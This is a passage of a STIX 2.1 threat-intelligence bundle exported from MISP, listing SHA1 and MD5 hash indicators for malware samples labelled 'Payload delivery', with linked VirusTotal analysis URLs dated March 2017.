"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8085-4f7c-4ab1-8ecb-4f2c02de0b81",
|
|
"value": "https://www.virustotal.com/file/6369d5d194bcc1db2ba8d85c3d15b031a1c2f12463a4259e7cd4686c598e436b/analysis/1445869626/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8086-aef8-478b-98d6-48d802de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:38:14.000Z",
|
|
"modified": "2017-03-29T09:38:14.000Z",
|
|
"description": "sample - Xchecked via VT: 5f860598d21cceeb7d67142b3a75f94cdee5a4bd7ab8718a35b04264154097e3",
|
|
"pattern": "[file:hashes.SHA1 = '799a6a3c8ae48ba307899265e5c411c7fe9b1004']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:38:14Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8087-ae90-47af-89bd-476d02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:38:15.000Z",
|
|
"modified": "2017-03-29T09:38:15.000Z",
|
|
"description": "sample - Xchecked via VT: 5f860598d21cceeb7d67142b3a75f94cdee5a4bd7ab8718a35b04264154097e3",
|
|
"pattern": "[file:hashes.MD5 = '1c4584826579201fbc23801fd4b02948']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:38:15Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8088-1ee8-4049-bd9c-412f02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:38:16.000Z",
|
|
"modified": "2017-03-29T09:38:16.000Z",
|
|
"first_observed": "2017-03-29T09:38:16Z",
|
|
"last_observed": "2017-03-29T09:38:16Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8088-1ee8-4049-bd9c-412f02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8088-1ee8-4049-bd9c-412f02de0b81",
|
|
"value": "https://www.virustotal.com/file/5f860598d21cceeb7d67142b3a75f94cdee5a4bd7ab8718a35b04264154097e3/analysis/1425452823/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8089-4ec0-4a25-a24c-46c102de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:38:17.000Z",
|
|
"modified": "2017-03-29T09:38:17.000Z",
|
|
"description": "sample - Xchecked via VT: 102602fd35bd0d00d28f4dfb1bc4eb2a207e4d8cb9f4311ac7b1133f9e43da26",
|
|
"pattern": "[file:hashes.SHA1 = 'f973499daa2dd0ef53672dfe2502023b48a092ed']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:38:17Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db808a-75b8-4310-82fa-4f5f02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:38:18.000Z",
|
|
"modified": "2017-03-29T09:38:18.000Z",
|
|
"description": "sample - Xchecked via VT: 102602fd35bd0d00d28f4dfb1bc4eb2a207e4d8cb9f4311ac7b1133f9e43da26",
|
|
"pattern": "[file:hashes.MD5 = '2de36dec04fa0e7c017ccb97f7f06b2a']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:38:18Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db808b-1b78-46d8-b1fe-426402de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:38:19.000Z",
|
|
"modified": "2017-03-29T09:38:19.000Z",
|
|
"first_observed": "2017-03-29T09:38:19Z",
|
|
"last_observed": "2017-03-29T09:38:19Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db808b-1b78-46d8-b1fe-426402de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db808b-1b78-46d8-b1fe-426402de0b81",
|
|
"value": "https://www.virustotal.com/file/102602fd35bd0d00d28f4dfb1bc4eb2a207e4d8cb9f4311ac7b1133f9e43da26/analysis/1445892412/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db808c-e9f4-4e7d-a647-4b8602de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:38:20.000Z",
|
|
"modified": "2017-03-29T09:38:20.000Z",
|
|
"description": "sample - Xchecked via VT: 2663d24e63d15e6f247039f7d0fb51958eddb5ad7043a2d305e24f8db6477271",
|
|
"pattern": "[file:hashes.SHA1 = 'cb241082117b0f333e4372319f8696a103a74ec2']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:38:20Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db808d-eb08-4f46-841a-419702de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:38:21.000Z",
|
|
"modified": "2017-03-29T09:38:21.000Z",
|
|
"description": "sample - Xchecked via VT: 2663d24e63d15e6f247039f7d0fb51958eddb5ad7043a2d305e24f8db6477271",
|
|
"pattern": "[file:hashes.MD5 = 'add3df96b6c5248cbeb0e5abffa244a2']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:38:21Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db808e-5b08-4fce-9ddd-474a02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:38:22.000Z",
|
|
"modified": "2017-03-29T09:38:22.000Z",
|
|
"first_observed": "2017-03-29T09:38:22Z",
|
|
"last_observed": "2017-03-29T09:38:22Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db808e-5b08-4fce-9ddd-474a02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db808e-5b08-4fce-9ddd-474a02de0b81",
|
|
"value": "https://www.virustotal.com/file/2663d24e63d15e6f247039f7d0fb51958eddb5ad7043a2d305e24f8db6477271/analysis/1430953805/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db808f-8344-454b-93a1-488502de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:38:23.000Z",
|
|
"modified": "2017-03-29T09:38:23.000Z",
|
|
"description": "sample - Xchecked via VT: c373ad48e60fb8a396a80927546e9898760422447981238d91679e6ee8a09d6d",
|
|
"pattern": "[file:hashes.SHA1 = 'aa8248960fe5da749020f9d20e2d05e607138b4b']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:38:23Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8090-8884-4c05-b0df-40e802de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:38:24.000Z",
|
|
"modified": "2017-03-29T09:38:24.000Z",
|
|
"description": "sample - Xchecked via VT: c373ad48e60fb8a396a80927546e9898760422447981238d91679e6ee8a09d6d",
|
|
"pattern": "[file:hashes.MD5 = 'c7e3fac23cc362f049ca2edafdcb8cf5']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:38:24Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8091-52b4-49fe-a01e-4fce02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:38:25.000Z",
|
|
"modified": "2017-03-29T09:38:25.000Z",
|
|
"first_observed": "2017-03-29T09:38:25Z",
|
|
"last_observed": "2017-03-29T09:38:25Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8091-52b4-49fe-a01e-4fce02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8091-52b4-49fe-a01e-4fce02de0b81",
|
|
"value": "https://www.virustotal.com/file/c373ad48e60fb8a396a80927546e9898760422447981238d91679e6ee8a09d6d/analysis/1432344838/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8091-5310-4ed5-9b30-4fd302de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:38:25.000Z",
|
|
"modified": "2017-03-29T09:38:25.000Z",
|
|
"description": "sample - Xchecked via VT: de6134aec7b39d8f90dcaf1da03ad50ecbc8b48a6e62b6a67d0cec68e9968267",
|
|
"pattern": "[file:hashes.SHA1 = 'eccc600efde5805a380eb029dc2d0b4d3075fd13']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:38:25Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8092-cc58-4058-b82b-4f3702de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:38:26.000Z",
|
|
"modified": "2017-03-29T09:38:26.000Z",
|
|
"description": "sample - Xchecked via VT: de6134aec7b39d8f90dcaf1da03ad50ecbc8b48a6e62b6a67d0cec68e9968267",
|
|
"pattern": "[file:hashes.MD5 = '013bdadc638268916e50d79043675f85']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:38:26Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8093-7648-4ee1-b1b4-4f7502de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:38:27.000Z",
|
|
"modified": "2017-03-29T09:38:27.000Z",
|
|
"first_observed": "2017-03-29T09:38:27Z",
|
|
"last_observed": "2017-03-29T09:38:27Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8093-7648-4ee1-b1b4-4f7502de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8093-7648-4ee1-b1b4-4f7502de0b81",
|
|
"value": "https://www.virustotal.com/file/de6134aec7b39d8f90dcaf1da03ad50ecbc8b48a6e62b6a67d0cec68e9968267/analysis/1433958435/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8094-b640-499d-94dd-47d302de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:38:28.000Z",
|
|
"modified": "2017-03-29T09:38:28.000Z",
|
|
"description": "sample - Xchecked via VT: 9011510e459b324b98b45284fba36d92c3dcafb2c9dc7a8a29256b3439a1c526",
|
|
"pattern": "[file:hashes.SHA1 = 'bf748ef3498c26d7688a0263c45dc9f9dbba85e1']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:38:28Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8095-0e24-49ae-962e-457e02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:38:29.000Z",
|
|
"modified": "2017-03-29T09:38:29.000Z",
|
|
"description": "sample - Xchecked via VT: 9011510e459b324b98b45284fba36d92c3dcafb2c9dc7a8a29256b3439a1c526",
|
|
"pattern": "[file:hashes.MD5 = '5b0f46c8f30ce5a7a480ad68b54dc0f4']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:38:29Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8096-02a0-4b63-b3d7-468902de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:38:30.000Z",
|
|
"modified": "2017-03-29T09:38:30.000Z",
|
|
"first_observed": "2017-03-29T09:38:30Z",
|
|
"last_observed": "2017-03-29T09:38:30Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8096-02a0-4b63-b3d7-468902de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8096-02a0-4b63-b3d7-468902de0b81",
|
|
"value": "https://www.virustotal.com/file/9011510e459b324b98b45284fba36d92c3dcafb2c9dc7a8a29256b3439a1c526/analysis/1434474168/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8097-37e0-42e7-a98e-4ad502de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:38:31.000Z",
|
|
"modified": "2017-03-29T09:38:31.000Z",
|
|
"description": "sample - Xchecked via VT: 949ad75ea9292d2d85498dc3a9ee033d736e40deba1a19a44419d91cee218a58",
|
|
"pattern": "[file:hashes.SHA1 = 'd87daa1b688120dea0e4a3adc3d2af447a6a64b1']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:38:31Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8098-fee4-4ec3-bfde-4cc502de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:38:32.000Z",
|
|
"modified": "2017-03-29T09:38:32.000Z",
|
|
"description": "sample - Xchecked via VT: 949ad75ea9292d2d85498dc3a9ee033d736e40deba1a19a44419d91cee218a58",
|
|
"pattern": "[file:hashes.MD5 = 'b05e1134ef00994a01257e33107225c1']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:38:32Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8099-0aa4-4dab-9c41-486f02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:38:33.000Z",
|
|
"modified": "2017-03-29T09:38:33.000Z",
|
|
"first_observed": "2017-03-29T09:38:33Z",
|
|
"last_observed": "2017-03-29T09:38:33Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8099-0aa4-4dab-9c41-486f02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8099-0aa4-4dab-9c41-486f02de0b81",
|
|
"value": "https://www.virustotal.com/file/949ad75ea9292d2d85498dc3a9ee033d736e40deba1a19a44419d91cee218a58/analysis/1434618729/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db809a-552c-4730-bb2e-49fc02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:38:34.000Z",
|
|
"modified": "2017-03-29T09:38:34.000Z",
|
|
"description": "sample - Xchecked via VT: 1583319eb9266680c0cdc81937c76242306f365b767abe4f85322bace65f9d3c",
|
|
"pattern": "[file:hashes.SHA1 = '175e7d9bd0ef1a97b055461b29d785c9e31c6120']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:38:34Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db809b-dde8-4873-abf7-4ed902de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:38:35.000Z",
|
|
"modified": "2017-03-29T09:38:35.000Z",
|
|
"description": "sample - Xchecked via VT: 1583319eb9266680c0cdc81937c76242306f365b767abe4f85322bace65f9d3c",
|
|
"pattern": "[file:hashes.MD5 = '7b3d30dfd0bf914d97daed9d2c89aa96']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:38:35Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db809c-6108-405e-b44e-437d02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:38:36.000Z",
|
|
"modified": "2017-03-29T09:38:36.000Z",
|
|
"first_observed": "2017-03-29T09:38:36Z",
|
|
"last_observed": "2017-03-29T09:38:36Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db809c-6108-405e-b44e-437d02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db809c-6108-405e-b44e-437d02de0b81",
|
|
"value": "https://www.virustotal.com/file/1583319eb9266680c0cdc81937c76242306f365b767abe4f85322bace65f9d3c/analysis/1481784387/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db809d-85c0-482b-a8f0-47a702de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:38:37.000Z",
|
|
"modified": "2017-03-29T09:38:37.000Z",
|
|
"description": "sample - Xchecked via VT: 86c2d111086dba6c114ed114b1392183c2be4283b1702d5970601d7a29201178",
|
|
"pattern": "[file:hashes.SHA1 = '5e4dc2b9f050366ab688cc58ddf226eefeaac600']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:38:37Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db809e-03bc-4212-8e39-4f4702de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:38:38.000Z",
|
|
"modified": "2017-03-29T09:38:38.000Z",
|
|
"description": "sample - Xchecked via VT: 86c2d111086dba6c114ed114b1392183c2be4283b1702d5970601d7a29201178",
|
|
"pattern": "[file:hashes.MD5 = '4934cf204dbb6cfaf77a5ae79d8a9021']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:38:38Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db809f-4c70-484d-ad5b-403a02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:38:39.000Z",
|
|
"modified": "2017-03-29T09:38:39.000Z",
|
|
"first_observed": "2017-03-29T09:38:39Z",
|
|
"last_observed": "2017-03-29T09:38:39Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db809f-4c70-484d-ad5b-403a02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db809f-4c70-484d-ad5b-403a02de0b81",
|
|
"value": "https://www.virustotal.com/file/86c2d111086dba6c114ed114b1392183c2be4283b1702d5970601d7a29201178/analysis/1473320589/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db80a0-d388-4f56-8b1a-4fbd02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:38:40.000Z",
|
|
"modified": "2017-03-29T09:38:40.000Z",
|
|
"description": "sample - Xchecked via VT: 5584a83d69a01b2a3402c21f78284f6de8ac0a7e5dd5b25b6b9b59eb95f4eeaf",
|
|
"pattern": "[file:hashes.SHA1 = '846eb26208ef685e02dd6a3e37278f56120be24a']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:38:40Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db80a1-1f88-4416-a9a8-437102de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:38:41.000Z",
|
|
"modified": "2017-03-29T09:38:41.000Z",
|
|
"description": "sample - Xchecked via VT: 5584a83d69a01b2a3402c21f78284f6de8ac0a7e5dd5b25b6b9b59eb95f4eeaf",
|
|
"pattern": "[file:hashes.MD5 = '9a84bf151a4577ae536460e439ed7b5f']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:38:41Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db80a2-b550-4f47-9a39-4df902de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:38:42.000Z",
|
|
"modified": "2017-03-29T09:38:42.000Z",
|
|
"first_observed": "2017-03-29T09:38:42Z",
|
|
"last_observed": "2017-03-29T09:38:42Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db80a2-b550-4f47-9a39-4df902de0b81"
|
|
],
|
|
"labels": [
|
|
